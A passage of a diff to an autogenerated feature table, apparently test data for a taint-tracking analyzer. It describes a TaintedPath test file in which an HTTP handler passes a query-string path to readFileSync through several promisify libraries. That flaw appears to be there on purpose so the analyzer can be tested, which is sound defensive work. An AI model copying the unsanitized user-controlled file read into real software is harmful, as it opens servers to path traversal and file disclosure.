autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:34 | exceptional return of require ... leSync) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:34 | exceptional return of require ... leSync) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:34 | exceptional return of require ... leSync) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:34 | exceptional return of require ... leSync) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:34 | require ... leSync) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:34 | require ... leSync) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:34 | require ... leSync) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:34 | require ... leSync) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:34 | require ... leSync) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:40 | exceptional return of require ... )(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:40 | exceptional return of require ... )(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:40 | exceptional return of require ... )(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:40 | exceptional return of require ... )(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:40 | exceptional return of require ... )(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:40 | require ... )(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:40 | require ... )(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:40 | require ... )(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:40 | require ... )(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:40 | require ... )(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:54:11:54:16 | "pify" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:54:11:54:16 | "pify" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:54:11:54:16 | "pify" | calleeImports | | @@ -10090,6 +81392,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:54:11:54:16 | "pify" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:54:11:54:16 | "pify" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:54:11:54:16 | "pify" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:20 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:20 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:20 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:20 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:20 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:33 | fs.readFileSync | CalleeFlexibleAccessPath | import(!) | | autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:33 | fs.readFileSync | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:33 | fs.readFileSync | calleeImports | pify | @@ -10098,6 +81405,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:33 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:33 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:54:19:54:33 | fs.readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:54:22:54:33 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:22:54:33 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:22:54:33 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:54:22:54:33 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:54:22:54:33 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:54:36:54:39 | path | CalleeFlexibleAccessPath | import(!)() | | autogenerated/TaintedPath/other-fs-libraries.js:54:36:54:39 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:54:36:54:39 | path | calleeImports | pify | @@ -10106,6 +81418,46 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:54:36:54:39 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:54:36:54:39 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:54:36:54:39 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:9 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:9 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:9 | require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:9 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:9 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:17 | exceptional return of require("pify") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:17 | exceptional return of require("pify") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:17 | exceptional return of require("pify") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:17 | exceptional return of require("pify") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:17 | exceptional return of require("pify") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:17 | require("pify") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:17 | require("pify") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:17 | require("pify") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:17 | require("pify") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:17 | require("pify") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:21 | exceptional return of require("pify")(fs) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:21 | exceptional return of require("pify")(fs) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:21 | exceptional return of require("pify")(fs) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:21 | exceptional return of require("pify")(fs) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:21 | exceptional return of require("pify")(fs) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:21 | require("pify")(fs) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:21 | require("pify")(fs) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:21 | require("pify")(fs) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:21 | require("pify")(fs) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:21 | require("pify")(fs) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:34 | require ... ileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:34 | require ... ileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:34 | require ... ileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:34 | require ... ileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:34 | require ... ileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:40 | exceptional return of require ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:40 | exceptional return of require ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:40 | exceptional return of require ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:40 | exceptional return of require ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:40 | exceptional return of require ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:40 | require ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:40 | require ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:40 | require ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:40 | require ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:55:3:55:40 | require ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:55:11:55:16 | "pify" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:55:11:55:16 | "pify" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:55:11:55:16 | "pify" | calleeImports | | @@ -10122,6 +81474,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:55:19:55:20 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:55:19:55:20 | fs | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:55:19:55:20 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:55:23:55:34 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:23:55:34 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:55:23:55:34 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:55:23:55:34 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:55:23:55:34 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:55:36:55:39 | path | CalleeFlexibleAccessPath | import(!)().readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:55:36:55:39 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:55:36:55:39 | path | calleeImports | pify | @@ -10130,6 +81487,41 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:55:36:55:39 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:55:36:55:39 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:55:36:55:39 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:9 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:9 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:9 | require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:9 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:9 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:27 | exceptional return of require ... isify') | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:27 | exceptional return of require ... isify') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:27 | exceptional return of require ... isify') | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:27 | exceptional return of require ... isify') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:27 | exceptional return of require ... isify') | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:27 | require ... isify') | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:27 | require ... isify') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:27 | require ... isify') | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:27 | require ... isify') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:27 | require ... isify') | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:44 | exceptional return of require ... leSync) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:44 | exceptional return of require ... leSync) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:44 | exceptional return of require ... leSync) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:44 | exceptional return of require ... leSync) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:44 | exceptional return of require ... leSync) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:44 | require ... leSync) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:44 | require ... leSync) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:44 | require ... leSync) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:44 | require ... leSync) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:44 | require ... leSync) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:50 | exceptional return of require ... )(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:50 | exceptional return of require ... )(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:50 | exceptional return of require ... )(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:50 | exceptional return of require ... )(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:50 | exceptional return of require ... )(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:50 | require ... )(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:50 | require ... )(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:50 | require ... )(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:50 | require ... )(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:57:3:57:50 | require ... )(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:57:11:57:26 | 'util.promisify' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:57:11:57:26 | 'util.promisify' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:57:11:57:26 | 'util.promisify' | calleeImports | | @@ -10138,6 +81530,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:57:11:57:26 | 'util.promisify' | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:57:11:57:26 | 'util.promisify' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:57:11:57:26 | 'util.promisify' | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:30 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:30 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:30 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:30 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:30 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:43 | fs.readFileSync | CalleeFlexibleAccessPath | import(!) | | autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:43 | fs.readFileSync | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:43 | fs.readFileSync | calleeImports | util.promisify | @@ -10146,6 +81543,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:43 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:43 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:57:29:57:43 | fs.readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:57:32:57:43 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:32:57:43 | readFileSync | contextSurroundingFunctionParameters | (req, 